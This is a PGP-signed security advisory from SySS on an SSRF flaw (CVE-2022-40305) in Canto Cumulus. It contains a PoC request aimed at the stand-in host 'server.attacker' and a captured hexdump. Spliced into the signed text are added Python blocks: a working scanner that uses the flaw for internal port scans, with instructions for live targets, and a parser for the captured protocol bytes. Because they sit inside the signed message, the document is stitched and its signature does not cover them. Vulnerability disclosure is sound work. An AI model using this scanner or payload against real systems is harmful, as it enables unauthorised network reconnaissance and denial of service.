-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2022-023
Product:                   Canto Cumulus
Manufacturer:              Canto Inc.
Affected Version(s):       Through 11.1.3
Tested Version(s):         11.1.3 (Build 26f5823e)
Vulnerability Type:        Server-Side Request Forgery (CWE-918)
Risk Level:                High
Solution Status:           Mitigation possible
Manufacturer Notification: 2022-03-25
Solution Date:             No solution
Public Disclosure:         2022-06-01
CVE Reference:             CVE-2022-40305
Author of Advisory:        Thibaud Kehler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Canto Cumulus is a digital asset management (DAM) system.[1]

Due to missing validation of untrusted input, the Cumulus web server is
vulnerable to server-side request forgery (SSRF): it opens an outbound
TCP connection, speaking an unknown proprietary protocol, to a host and
port chosen by the client. This behavior poses a risk of
denial-of-service (DoS) attacks, impersonation attacks and attacks on the
protocol itself, with the theoretical result of remote code execution
(RCE) or authentication bypass.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

When logging in to the web server via the form at the URL
https://hostname.example/cwc/login, a hidden URL parameter 'server' is
sent to the server in the respective HTTP POST request to
https://hostname.example/cwc/catalog. Afterwards, the web server
establishes a TCP connection to the system specified in that parameter
via an unknown protocol. This yields the following problems:

* Denial of service: The web server keeps the TCP connection open for
  around 60 seconds. This could be misused to exhaust limited resources
  on the server or the server's infrastructure, e.g. NAT tables or
  connection pools, resulting in a DoS.

* Internal port scan: The web server responds differently depending on
  whether it was able to establish a connection to the specified TCP
  port. An attacker can use this behavior to conduct a port scan of the
  internal network from the web server's network position.
* Authentication bypass (theoretical): As the server is specified during
  authentication, the server-side request may be what verifies the
  credentials entered in the login form. An attacker could pose as the
  authentication server and forge a successful login or elevated
  privileges in the web application.

* Protocol attacks (theoretical): The server-side request uses an unknown
  binary protocol. An attacker might launch further attacks on that
  protocol, e.g. buffer overflow or deserialization attacks. In the worst
  case, if the web server's implementation of the protocol is vulnerable
  to such attacks, this results in RCE on the web server.

SySS recommends restricting web server-side requests to a limited set of
trusted servers.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

An attacker can specify an arbitrary IP address / hostname and port, as
depicted in the following HTTP POST request:

POST /cwc/catalog HTTP/1.1
Host: hostname.example
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

OWASP_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encoding=UTF-8&server=server.attacker:80

While processing this request, the web server connects to the specified
TCP port on the specified host and sends the following bytes of its
proprietary protocol (captured here with ncat on the attacker's host):

# ncat -nlvp 80 | hexdump -C
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from [WAN IP].
Ncat: Connection from [WAN IP]:10402.
00000000  00 00 00 28 72 65 63 6f  00 00 00 02 00 00 00 04  |...(reco........|
00000010  63 4d 49 44 4c 6f 6e 67  73 69 52 51 00 00 00 04  |cMIDLongsiRQ....|
00000020  53 65 72 23 4c 6f 6e 67  00 04 77 7b 00 00 00 18  |Ser#Long..w{....|
00000030  72 65 63 6f 00 00 00 01  00 00 00 04 63 4d 49 44  |reco........cMID|
00000040  4c 6f 6e 67 51 75 69 74                           |LongQuit|
00000048

If the specified host responds in an unexpected way, the web server
closes the server-side connection and answers the initial HTTP request
with HTTP status code 302 and a redirect to an error page:

HTTP/1.1 302
Server: nginx
Date: Wed, 23 Mar 2022 16:31:43 GMT
Content-Type: text/json;charset=utf-8
Content-Length: 0
Connection: keep-alive
Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=16070400
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true

If the DNS name cannot be resolved or the specified TCP port is
unreachable, the web server instead responds with HTTP status code 500
and renders the login form again, with an additional error message
stating that the server could not be reached. This difference in
behavior is what enables the internal port scan.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer has not released a patch and will not address the
vulnerability. The manufacturer recommends securing the Cumulus server
by using a firewall.

Note that this only mitigates the issue insofar as outbound connections
from the Cumulus web server are restricted to the legitimate Cumulus
server(s); without such egress filtering, the 'server' parameter remains
exploitable as described above.
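The following script turns the differing 302/500 behavior described in the PoC into a port probe. It is an added example and not part of the SySS advisory or of Canto's software. The parameter names, the error-page path and the "could not be reached" wording are taken from the responses shown above; the session cookie, the CSRF token handling and the interpretation of an HTTP timeout are assumptions and are marked as such in the code. The transport is injected as a `send` callable so the classification logic runs offline against constructed responses; `http_sender` wires it to a real Cumulus host.

```python
"""Differential-response probe for the Cumulus 'server' parameter (CVE-2022-40305).

Added example, not code from the advisory or from Canto. The HTTP transport is
abstracted behind a send(body) callable so the classifier can be exercised
offline; http_sender() talks to a real host.
"""
import http.client
import socket
import ssl
import urllib.parse

LOGIN_PATH = "/cwc/catalog"
# Markers taken from the advisory's two observed responses.
ERROR_REDIRECT = "/cwc/error.jspx?errorID=CumulusError"
UNREACHABLE_MARKER = "could not be reached"   # wording of the HTTP 500 login page


def build_login_body(csrf_token, target_host, target_port, user="guest", password="guest"):
    """Form body of the login POST, with the hidden 'server' field pointing at the probe target."""
    return urllib.parse.urlencode({
        "OWASP_CSRFTOKEN": csrf_token,
        "user": user,
        "password": password,
        "encoding": "UTF-8",
        "server": "%s:%d" % (target_host, target_port),
    })


def classify_response(status, location, body):
    """Map the web server's reaction to the state of the probed TCP port.

    302 to the Cumulus error page: the back-end connected and got a reply it
    did not understand, so the port is open. 500 with the 'could not be
    reached' login page: DNS failure or no listener. Anything else (e.g. a
    real Cumulus server answering, or a changed build) is left undecided.
    """
    if status == 302 and location and location.startswith(ERROR_REDIRECT):
        return "open"
    if status == 500 and UNREACHABLE_MARKER in body:
        return "closed"
    return "unknown"


def scan(send, csrf_token, target_host, ports):
    """Probe each port through the SSRF and return {port: state}."""
    results = {}
    for port in ports:
        body = build_login_body(csrf_token, target_host, port)
        try:
            status, location, text = send(body)
        except (socket.timeout, TimeoutError):
            # Assumption: a listener that accepts but never answers keeps the
            # back-end connection open (~60 s per the advisory), so the HTTP
            # request times out. Reported separately, not as proof of "open".
            results[port] = "timeout"
            continue
        results[port] = classify_response(status, location, text)
    return results


def http_sender(cumulus_host, session_cookie=None, timeout=90, verify_tls=True):
    """Return a send(body) callable that POSTs to the Cumulus web server.

    http.client is used instead of urllib so the 302 is returned, not followed.
    Assumption: a session cookie and a matching OWASP_CSRFTOKEN must first be
    obtained from /cwc/login; the advisory does not show how the token is bound.
    """
    context = ssl.create_default_context()
    if not verify_tls:
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

    def send(body):
        conn = http.client.HTTPSConnection(cumulus_host, timeout=timeout, context=context)
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        if session_cookie:
            headers["Cookie"] = session_cookie
        conn.request("POST", LOGIN_PATH, body=body, headers=headers)
        resp = conn.getresponse()
        text = resp.read().decode("utf-8", "replace")
        conn.close()
        return resp.status, resp.getheader("Location"), text

    return send


# Constructed responses modelled on the advisory's observed outcomes (offline use only).
FAKE_RESPONSES = {
    "10.0.0.5:22": (302, ERROR_REDIRECT + "&errorTitle=Cumulus+error", ""),
    "10.0.0.5:23": (500, None, "<html>... The server could not be reached ...</html>"),
}


def fake_sender(body):
    """Offline stand-in for http_sender(): looks the 'server' field up in FAKE_RESPONSES."""
    server = urllib.parse.parse_qs(body)["server"][0]
    return FAKE_RESPONSES.get(server, (200, None, "<html>dashboard</html>"))


if __name__ == "__main__":
    print(scan(fake_sender, "TOKEN", "10.0.0.5", [22, 23, 80]))
```

Against a live target, replace `fake_sender` with `http_sender("hostname.example", session_cookie="JSESSIONID=...")`. Keep the HTTP timeout above the roughly 60 seconds the back-end holds a silent connection open, otherwise every open-but-silent port is misreported, and remember that each probe ties up one outbound connection on the Cumulus host for that long.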
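The 72 bytes the web server sent to the ncat listener in the PoC can be split into messages without knowing the protocol, because the dump itself proves a 4-byte big-endian length prefix: 4 + 0x28 + 4 + 0x18 = 72. The parser below is an added example, not code from the advisory or from Canto. The framing is the only part the capture establishes; the field layout inside a frame (`reco` tag, field count, then `length | name | type | value` fields) is a hypothesis that happens to account for every byte of both frames and is labelled as such in the code. Nothing here claims to reproduce the protocol.

```python
"""Frame splitter for the bytes Cumulus sent to the attacker's listener.

Added example, not code from the advisory or from Canto. The 4-byte length
prefix is established by the capture; the record layout is a HYPOTHESIS.
"""
import struct

# The 72 bytes from the advisory's hexdump, transcribed verbatim.
CAPTURE = bytes.fromhex(
    "00000028 7265636f 00000002 00000004 634d4944 4c6f6e67 73695251 00000004"
    " 53657223 4c6f6e67 0004777b 00000018 7265636f 00000001 00000004 634d4944"
    " 4c6f6e67 51756974"
)


def split_frames(data):
    """Split a byte stream into frames using the observed 4-byte big-endian length prefix.

    Raises ValueError on a truncated stream instead of returning a partial
    frame; a parser for an unknown protocol must not guess at missing bytes.
    """
    frames, off = [], 0
    while off < len(data):
        if off + 4 > len(data):
            raise ValueError("truncated length prefix at offset %d" % off)
        (length,) = struct.unpack_from(">I", data, off)
        off += 4
        if off + length > len(data):
            raise ValueError("frame claims %d bytes, only %d left" % (length, len(data) - off))
        frames.append(data[off:off + length])
        off += length
    return frames


def parse_record(frame):
    """HYPOTHESIS (not confirmed by the vendor): a frame is laid out as

        b'reco' | u32 field_count | field_count x (u32 value_len | 4-char name | 4-char type | value)

    This accounts for every byte of both captured frames with no remainder;
    it is checked, and a mismatch raises rather than being silently accepted.
    """
    if frame[:4] != b"reco":
        raise ValueError("unexpected record tag %r" % frame[:4])
    (count,) = struct.unpack_from(">I", frame, 4)
    off, fields = 8, []
    for _ in range(count):
        (vlen,) = struct.unpack_from(">I", frame, off)
        name = frame[off + 4:off + 8].decode("ascii")
        ftype = frame[off + 8:off + 12].decode("ascii")
        value = frame[off + 12:off + 12 + vlen]
        if len(value) != vlen:
            raise ValueError("field %s truncated" % name)
        fields.append((name, ftype, value))
        off += 12 + vlen
    if off != len(frame):
        raise ValueError("%d trailing bytes do not fit the hypothesised layout" % (len(frame) - off))
    return fields


def summarize(data):
    """Return one (frame_length, fields) tuple per frame, for reporting."""
    return [(len(f), parse_record(f)) for f in split_frames(data)]


if __name__ == "__main__":
    for length, fields in summarize(CAPTURE):
        print("frame of %d bytes:" % length)
        for name, ftype, value in fields:
            print("  %-4s %-4s %r" % (name, ftype, value))
```

Under this reading the capture contains two records: one with the fields `cMID`/`Long` = `siRQ` and `Ser#`/`Long` = 0x0004777b, and one with `cMID`/`Long` = `Quit`. All tags are four printable ASCII characters, which is visible in the dump without any hypothesis. Whether `Long` denotes a 32-bit integer, what `siRQ` and `Ser#` mean, and which message a genuine Cumulus server would expect in reply are not established by the advisory; the strict length and trailing-byte checks are what keep the parser honest when a different build sends something else.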
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-03-18: Vulnerability discovered
2022-03-25: Vulnerability reported to the manufacturer
2022-05-11: Manufacturer informed SySS that it will not address the
            vulnerability
2022-06-01: Public disclosure of the vulnerability
2022-09-09: CVE-2022-40305 assigned

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Canto Cumulus
    https://www.canto.com/de/cumulus/
[2] SySS Security Advisory SYSS-2022-023 (not yet published)
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thibaud Kehler of SySS GmbH.

E-Mail: thibaud.kehler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key ID: 0xB645 7D7A
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmMa5SQACgkQ6ceYZrZF
fXreoQ//UxVF4wkbgxSV5Bq+5fyugMD+G91+c6J6FXVt11/kGr6oz9DQWIXpmvbN
MOzy1nNM8Kfvr5JXWR13FcdiS7KVzmUPpG4PITr5y4W0nJTSlDslbA5XiFme7sb8
foKEoSckdo4kWJzJEOq1AtadkvJxRMPgkijHhnn5JdAmgbhOm53hJMOWVjyEA+cw
IDMdCuL+XzJ+L7EfA6Eo/r8vFNRBWfG0+knnzUSFlizTWVoYsN/kCoMdHWkv7Fr8
QW9GfhoQ7m5jsXXxP1yKId7Uc2QvV+7aqtHObq9qBSHWVKS9R7kPhSg3xvqVNNnr
4bmFXG0TuUB3ycCoq6L2dipkYiNSWaXET7N+8fm8Tuxfl4PMuIN1u5GYe1iDhDBH
yF5ci2uxYD5U+Xwn42byoER1CB6afx9jWs4iHtTcJfVTPXKe9w9o+xH1uEAbl0U9
JPOqWGxtN/SgFCKYwq3r82IV1/j79T6xdspngCX5nUpfIvypL6pN+eshBx8ocsPn
uiSZgrYqgg3h1l+rUo2jbGUWKdJwZtq2xpyJ3f7D6yqdap5l+EWQgGvtHkq0tVQX
T740Gg9VgM8WdpsLXpIw3Cz9KWv0C7WL9KZREDl7q67DrSsOp182IVDIz0x/dqNG
aZl4oox7GgYrelMJmE/bgPyKvyeeT6rE3ppkztY1PEEwSoZI4V8=
=Yzmg
-----END PGP SIGNATURE-----